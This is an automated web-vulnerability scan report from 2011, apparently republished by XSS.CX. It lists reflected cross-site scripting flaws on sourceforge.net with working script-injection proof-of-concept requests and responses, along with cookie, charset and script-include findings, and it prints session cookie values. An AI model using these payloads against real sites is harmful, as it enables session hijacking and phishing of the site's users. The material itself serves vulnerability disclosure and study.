XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, sourceforge.net

Report generated by XSS.CX at Sat Jun 18 07:07:01 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://sourceforge.net/search/ [name of an arbitrarily supplied request parameter]

1.2. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]

2. Cookie without HttpOnly flag set

2.1. http://sourceforge.net/search/

2.2. http://sourceforge.net/projects/aresgalaxy/best_release.json

2.3. http://sourceforge.net/projects/assp/best_release.json

2.4. http://sourceforge.net/projects/autoap/best_release.json

2.5. http://sourceforge.net/projects/azureus/best_release.json

2.6. http://sourceforge.net/projects/boost/best_release.json

2.7. http://sourceforge.net/projects/corefonts/best_release.json

2.8. http://sourceforge.net/projects/emule/best_release.json

2.9. http://sourceforge.net/projects/filezilla/best_release.json

2.10. http://sourceforge.net/projects/georaptor/

2.11. http://sourceforge.net/projects/georaptor/reviews

2.12. http://sourceforge.net/projects/georaptor/reviews/

2.13. http://sourceforge.net/projects/gimp-win/best_release.json

2.14. http://sourceforge.net/projects/handbrake/best_release.json

2.15. http://sourceforge.net/projects/megacubo-br/best_release.json

2.16. http://sourceforge.net/projects/mingw/best_release.json

2.17. http://sourceforge.net/projects/mpc-hc/best_release.json

2.18. http://sourceforge.net/projects/pdfcreator/best_release.json

2.19. http://sourceforge.net/projects/pidgin/best_release.json

2.20. http://sourceforge.net/projects/portableapps/best_release.json

2.21. http://sourceforge.net/projects/sevenzip/best_release.json

2.22. http://sourceforge.net/projects/stellarium/best_release.json

2.23. http://sourceforge.net/projects/tortoisesvn/best_release.json

2.24. http://sourceforge.net/projects/ubuntuzilla/best_release.json

2.25. http://sourceforge.net/projects/ultrastardx/best_release.json

2.26. http://sourceforge.net/projects/unetbootin/best_release.json

2.27. http://sourceforge.net/projects/virtualdub/best_release.json

2.28. http://sourceforge.net/projects/wampserver/best_release.json

2.29. http://sourceforge.net/projects/xampp/best_release.json

3. Cross-domain script include

3.1. http://sourceforge.net/projects/georaptor/

3.2. http://sourceforge.net/projects/georaptor/reviews/

3.3. http://sourceforge.net/search/

4. File upload functionality

5. HTML does not specify charset

5.1. http://sourceforge.net/export/rss2_projnews.php

5.2. http://sourceforge.net/hostedapp/

5.3. http://sourceforge.net/mail/

5.4. http://sourceforge.net/mailarchive/forum.php

5.5. http://sourceforge.net/news/

5.6. http://sourceforge.net/project/project_donations.php

5.7. http://sourceforge.net/project/screenshots.php

5.8. http://sourceforge.net/project/stats/

5.9. http://sourceforge.net/project/stats/detail.php

5.10. http://sourceforge.net/scm/

5.11. http://sourceforge.net/search/

5.12. http://sourceforge.net/tracker/

5.13. http://sourceforge.net/users/

6. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://sourceforge.net/search/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9be1"><script>alert(1)</script>ca7befe1b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?b9be1"><script>alert(1)</script>ca7befe1b0c=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Set-Cookie: PHPSESSID=c991f523f8f8682b43951844e5963a7a; expires=Sat, 02-Jul-2011 01:38:57 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:57 GMT
Server: lighttpd/1.4.26
Content-Length: 90124

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8"
...[SNIP]...
<a href="/search/?b9be1"><script>alert(1)</script>ca7befe1b0c=1&fq%5B%5D=trove%3A688">
...[SNIP]...

1.2. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17b3"><script>alert(1)</script>52257c2de10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /softwaremap/?d17b3"><script>alert(1)</script>52257c2de10=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Set-Cookie: PHPSESSID=2bd280d27a2a37ba13117cfb03e3b699; expires=Sat, 02-Jul-2011 01:38:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:43 GMT
Server: lighttpd/1.4.26
Content-Length: 90007

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8"
...[SNIP]...
<a href="/softwaremap/?d17b3"><script>alert(1)</script>52257c2de10=1&fq%5B%5D=trove%3A688">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 29 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://sourceforge.net/search/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sourceforge.net
Path:   /search/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Set-Cookie: PHPSESSID=098d46b43f016162fdfd8d635678a9d2; expires=Sat, 02-Jul-2011 01:38:27 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:27 GMT
Server: lighttpd/1.4.26
Content-Length: 80719

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8"
...[SNIP]...

2.2. http://sourceforge.net/projects/aresgalaxy/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/aresgalaxy/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/aresgalaxy/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:46 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=19a7c28f3707c88f8ee8d409aa1062b5e9c43a9bgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO5Xhk1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 650
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "595d248b114dc118b75d6784a9b62645", "bytes": 2513223.0, "sf_file_id": 3370725, "filename": "/aresgalaxy/AresR
...[SNIP]...

2.3. http://sourceforge.net/projects/assp/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/assp/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/assp/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:48 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:48 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=0921d4ebf6bf34cc3d67dbfada9b92f5401483b7gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPAcaDVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 621
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "5ccfaf9d7947ad5182070cbfc89a0faf", "bytes": 759829.0, "sf_file_id": 4624064, "filename": "/ASSP Installation
...[SNIP]...

2.4. http://sourceforge.net/projects/autoap/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/autoap/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/autoap/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:46 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=db25e7fe2fb4fd5a0589c47a97e75c7d27b95251gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO7d2R1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 647
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": 552510, "release_notes_url": null, "file_type": "f", "md5sum": "c52e278928b28d050bbcd8988d317e17", "bytes": 1759973.0, "sf_file_id": 1290065, "filename": "/AutoAP NG v24
...[SNIP]...

2.5. http://sourceforge.net/projects/azureus/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/azureus/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/azureus/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=095ba9155c248975e826b8933044328bc9cc281dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPEFI3FUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 519
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": null, "bytes": 9027000.0, "sf_file_id": 4610865, "filename": "/vuze/Vuze_4604/Vuze_4604_windows.exe", "sf_dow
...[SNIP]...

2.6. http://sourceforge.net/projects/boost/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/boost/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/boost/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:53 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:53 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=060cf04661bf32287363c7ad0a0259e57aee5384gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPVPILlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 597
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "15ec7ae2c8354e4d070a67660f022c5b", "bytes": 121443.0, "sf_file_id": 2933467, "filename": "/boost-jam/3.1.18/
...[SNIP]...

2.7. http://sourceforge.net/projects/corefonts/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/corefonts/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/corefonts/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
